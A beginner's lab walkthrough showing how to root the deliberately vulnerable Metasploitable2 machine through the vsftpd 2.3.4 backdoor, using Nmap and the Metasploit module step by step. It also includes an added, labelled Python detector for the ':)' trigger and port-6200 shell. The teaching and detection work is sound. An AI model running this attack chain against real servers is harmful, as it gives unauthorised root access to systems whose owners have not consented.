Alex Agyei

Exploiting vsftpd 2.3.4 on Metasploitable2 (Step-by-Step Guide for Beginners)

One of the biggest turning points in learning cybersecurity is understanding how attackers move from:

Discovery → Exploitation → Access

In a training session I led, students went from running a simple scan to gaining root access on a vulnerable machine. The excitement was great, but the real value was understanding how and why it worked.

In this guide, you'll replicate that exact process step by step.


What You’ll Learn

  • How to scan a target using Nmap
  • How to identify vulnerable services
  • How the vsftpd 2.3.4 backdoor works
  • How to exploit it using Metasploit
  • How to gain root access

Prerequisites

Make sure your lab is ready:

  • Kali Linux (attacker)

  • Metasploitable2 (target)

  • Both machines on the same network (NAT or Host-only)

Step 1: Get the Target IP

On Metasploitable2:

ifconfig

Look for something like:

192.168.56.101

Step 2: Scan with Nmap

On Kali:

nmap -sV target_ip

Why -sV matters

  • Detects service versions
  • Helps you find known vulnerabilities

Key Result

21/tcp open ftp vsftpd 2.3.4

👉 This is your entry point.

Step 3: Understand the Vulnerability

vsftpd 2.3.4 contains a backdoor.

Trigger condition:
Login using a username ending with :)

What happens:
A shell opens on port 6200

Metasploitable2 is intentionally vulnerable, which makes it perfect for learning exploitation.
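
The same trigger seen from the defender's side: this added example (not part of the original post) flags FTP logins whose username ends with :) and any connection to port 6200 that follows on the same server. The record layout, the 30-second window, and all names in the code are assumptions made for illustration, and the sample records are constructed.

```python
import re
from collections import namedtuple

Event = namedtuple("Event", "ts src dst dport payload")
USER_RE = re.compile(r"USER\s+(\S.*)", re.IGNORECASE)

# Constructed sample records (not a real capture). The one-line-per-event
# layout "epoch src dst dport payload" is a hypothetical sensor export.
SAMPLE = """\
1700000000 192.168.56.1 192.168.56.101 21 USER anonymous
1700000002 192.168.56.1 192.168.56.101 21 PASS guest@
1700000100 192.168.56.50 192.168.56.101 21 USER lab:)
1700000101 192.168.56.50 192.168.56.101 21 PASS x
1700000103 192.168.56.50 192.168.56.101 6200 -
1700000900 192.168.56.77 192.168.56.101 6200 -
1700001000 192.168.56.60 192.168.56.102 21 USER smile:)
"""

def parse(text):
    """Turn the constructed records into Event tuples, skipping short lines."""
    events = []
    for line in text.splitlines():
        parts = line.split(None, 4)
        if len(parts) == 5:
            ts, src, dst, dport, payload = parts
            events.append(Event(int(ts), src, dst, int(dport), payload.strip()))
    return events

def detect(events, window=30):
    """Flag ':)' usernames on port 21 and port-6200 connections that follow."""
    alerts, last_trigger = [], {}          # last_trigger: server IP -> Event
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.dport == 21:
            m = USER_RE.match(ev.payload)
            if m and m.group(1).rstrip().endswith(":)"):
                last_trigger[ev.dst] = ev
                alerts.append(("trigger-username", ev.src, ev.dst, ev.ts))
        elif ev.dport == 6200:
            trig = last_trigger.get(ev.dst)
            # 6200 soon after the trigger is consistent with the backdoor shell.
            if trig and 0 <= ev.ts - trig.ts <= window:
                alerts.append(("backdoor-shell", ev.src, ev.dst, ev.ts))
            else:
                alerts.append(("port-6200-unexplained", ev.src, ev.dst, ev.ts))
    return alerts

if __name__ == "__main__":
    for alert in detect(parse(SAMPLE)):
        print(alert)
```

In the lab, the "backdoor-shell" alert corresponds to the moment the Metasploit module in the later steps reports its session.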

Step 4: Start Metasploit on Kali

msfconsole

Step 5: Find the Exploit

search vsftpd

Expected result:
exploit/unix/ftp/vsftpd_234_backdoor

Step 6: Load the Exploit

use exploit/unix/ftp/vsftpd_234_backdoor

Step 7: Set Target IP

set RHOST target_ip

Step 8: Run the Exploit

run

If successful:

Command shell session 1 opened

Step 9: Confirm Access

whoami

Output:

root

🎉 You now have root access.

Key Concepts (Simple Breakdown)

Reconnaissance

  • Finding open ports and services
  • Example tool: Nmap

Enumeration

  • Identifying versions and weaknesses
  • This is where real attack paths appear

Exploitation

  • Using a vulnerability to gain access
  • In this case: a built-in backdoor

Metasploit

  • A framework that automates exploitation
  • Saves time and standardizes attacks

Common Beginner Mistakes

  1. Skipping Version Detection

Wrong:

nmap target_ip

Correct:

nmap -sV target_ip

  2. Using the Wrong IP

  • Mixing up the attacker and target IPs
  • Using 127.0.0.1 incorrectly

✔ Always verify:

ifconfig

  3. Network Misconfiguration

If nothing works:

Check both VMs are on the same network

  4. Forgetting RHOST

set RHOST target_ip

  5. Blindly Running Exploits

Don’t just run tools. Ask:

  • Why does this vulnerability exist?
  • What triggered it?
  • How would this look in a real system?

Pro Tips

Run deeper scans:

nmap -A target_ip

Think like a professional

Use a workflow:

  1. Scan
  2. Identify
  3. Research
  4. Exploit
  5. Validate

Conclusion

This lab shows a complete beginner-friendly attack chain:

  1. Discover a service
  2. Identify its version
  3. Find a vulnerability
  4. Exploit it
  5. Gain access

Even though this is a deliberately vulnerable system, the process is exactly how real penetration testing works.

The goal is not just to hack, but to understand.

Next Steps

  • Repeat this lab without guidance
  • Document it on GitHub (build your portfolio)
  • Try another vulnerable service on Metasploitable2

Final Note

If you're learning cybersecurity:

Stay consistent.
Stay curious.
Keep building.

Follow for more hands-on cybersecurity labs and real-world breakdowns.
